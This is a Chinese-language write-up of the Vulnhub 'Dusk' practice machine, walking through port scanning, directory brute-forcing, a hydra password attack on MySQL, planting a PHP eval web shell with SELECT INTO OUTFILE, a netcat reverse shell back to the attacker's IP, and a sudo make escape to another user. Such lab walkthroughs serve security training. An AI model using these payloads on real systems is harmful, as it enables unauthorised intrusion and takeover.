Vulnhub之Dusk靶机测试过程
Dusk
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:02:3b:33 1 60 PCS Systemtechnik GmbH
192.168.56.208 08:00:27:b6:83:b3 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.208
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.208 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-12 08:51 EST
Nmap scan report for 192.168.56.208
Host is up (0.00026s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.56.208:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 b5ff692a03fd6d04ed2a06aabfb26a7c (RSA)
| 256 0b6f20d67c6c84bed8406169a2c6e88a (ECDSA)
|_ 256 85ff47d99250cbf7446cb4f45ce91ced (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: dusk.dusk, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
| ssl-cert: Subject: commonName=dusk.dusk
| Subject Alternative Name: DNS:dusk.dusk
| Not valid before: 2019-11-27T21:09:14
|_Not valid after: 2029-11-24T21:09:14
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp open mysql MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.18-MariaDB-0+deb10u1
| Thread ID: 37
| Capabilities flags: 63486
| Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, FoundRows, Support41Auth, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, SupportsCompression, IgnoreSigpipes, ConnectWithDatabase, LongColumnFlag, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: \F'/U@~}xbcL/EP?.d1e
|_ Auth Plugin Name: mysql_native_password
8080/tcp open http PHP cli server 5.5 or later (PHP 7.3.11-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:B6:83:B3 (Oracle VirtualBox virtual NIC)
Service Info: Host: dusk.dusk; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.87 seconds
获得Shell
3306端口
看有无弱口令
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: NO)
21端口
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ ftp 192.168.56.208
Connected to 192.168.56.208.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.208:kali): anonymous
331 Username ok, send password.
Password:
530 Anonymous access not allowed.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ searchsploit pyftpdlib 1.5.5
Exploits: No Results
Shellcodes: No Results
-
不允许匿名访问
-
FTP服务器软件版本没有可利用漏洞
80端口
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ nikto -h http://192.168.56.208
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.208
+ Target Hostname: 192.168.56.208
+ Target Port: 80
+ Start Time: 2023-01-12 08:56:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 598295a712980, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-01-12 08:56:48 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/12 08:58:00 Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.208/javascript/]
/server-status (Status: 403) [Size: 279]
Progress: 219400 / 220561 (99.47%)===============================================================
2023/01/12 08:58:26 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh,js
[+] Timeout: 10s
===============================================================
2023/01/12 08:59:49 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.208/javascript/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1321074 / 1323366 (99.83%)===============================================================
2023/01/12 09:02:36 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ dirb http://192.168.56.208
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jan 12 09:03:27 2023
URL_BASE: http://192.168.56.208/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.208/ ----
+ http://192.168.56.208/index.html (CODE:200|SIZE:10701)
==> DIRECTORY: http://192.168.56.208/javascript/
+ http://192.168.56.208/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.208/javascript/ ----
==> DIRECTORY: http://192.168.56.208/javascript/jquery/
---- Entering directory: http://192.168.56.208/javascript/jquery/ ----
+ http://192.168.56.208/javascript/jquery/jquery (CODE:200|SIZE:271809)
-----------------
END_TIME: Thu Jan 12 09:03:31 2023
DOWNLOADED: 13836 - FOUND: 3
没有扫描出有价值的信息。
8080端口
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ nikto -h http://192.168.56.208:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.208
+ Target Hostname: 192.168.56.208
+ Target Port: 8080
+ Start Time: 2023-01-12 09:04:02 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/7.3.11-1~deb10u1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2023-01-12 09:04:15 (GMT-5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,js,php
[+] Timeout: 10s
===============================================================
2023/01/12 09:06:32 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.208:8080/9017c201-9961-4795-ad75-f9c8e97668ec => 200 (Length: 257). To continue please exclude the status code or the length
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js --exclue-length 257
Error: unknown flag: --exclue-length
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js --exclude-length 257
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 257
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,js,php
[+] Timeout: 10s
===============================================================
2023/01/12 09:06:48 Starting gobuster in directory enumeration mode
===============================================================
/21540 (Status: 200) [Size: 340]
/head_02 (Status: 200) [Size: 340]
/PublicEducation (Status: 200) [Size: 340]
/play-poker (Status: 200) [Size: 340]
Progress: 1322766 / 1323366 (99.95%)===============================================================
2023/01/12 09:19:12 Finished
===============================================================
看了其他人的做法,是去破解mysql的密码(有点反常哈哈)
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.56.208
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-12 09:20:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.56.208:3306/
[3306][mysql] host: 192.168.56.208 login: root password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-12 09:20:28
这说明Mysql还是有弱口令,在前面弱口令尝试的时候,只试了空密码,root,应该再试一下password.
由于从访问8080网页知道,当前目录位于/var/tmp目录
http://192.168.56.208:8080/
因此可以写入一句话:
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 55
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> select "<?php eval($_GET['cmd']);?>" into outfile "/var/tmp/1.php";
Query OK, 1 row affected (0.000 sec)
MariaDB [(none)]>
访问1.php文件,并带入参数cmd,并建立反弹的shell
http://192.168.56.208:8080/1.php?cmd=system(%27nc%20-e%20/bin/bash%20192.168.56.206%205555%27);
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.208] 46350
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dusk:/var/tmp$
提权
www-data@dusk:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on dusk:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on dusk:
(dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
www-data@dusk:/home$
www-data@dusk:/home$ COMMAND='/bin/sh'
COMMAND='/bin/sh'
www-data@dusk:/home$ sudo -u dusk /usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
<u dusk /usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
$ id
id
uid=1000(dusk) gid=1000(dusk) groups=1000(dusk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner),123(docker)
$
成功的切换到了dusk
然后利用docker进行root提权
STRIVE FOR PROGRESS,NOT FOR PERFECTION
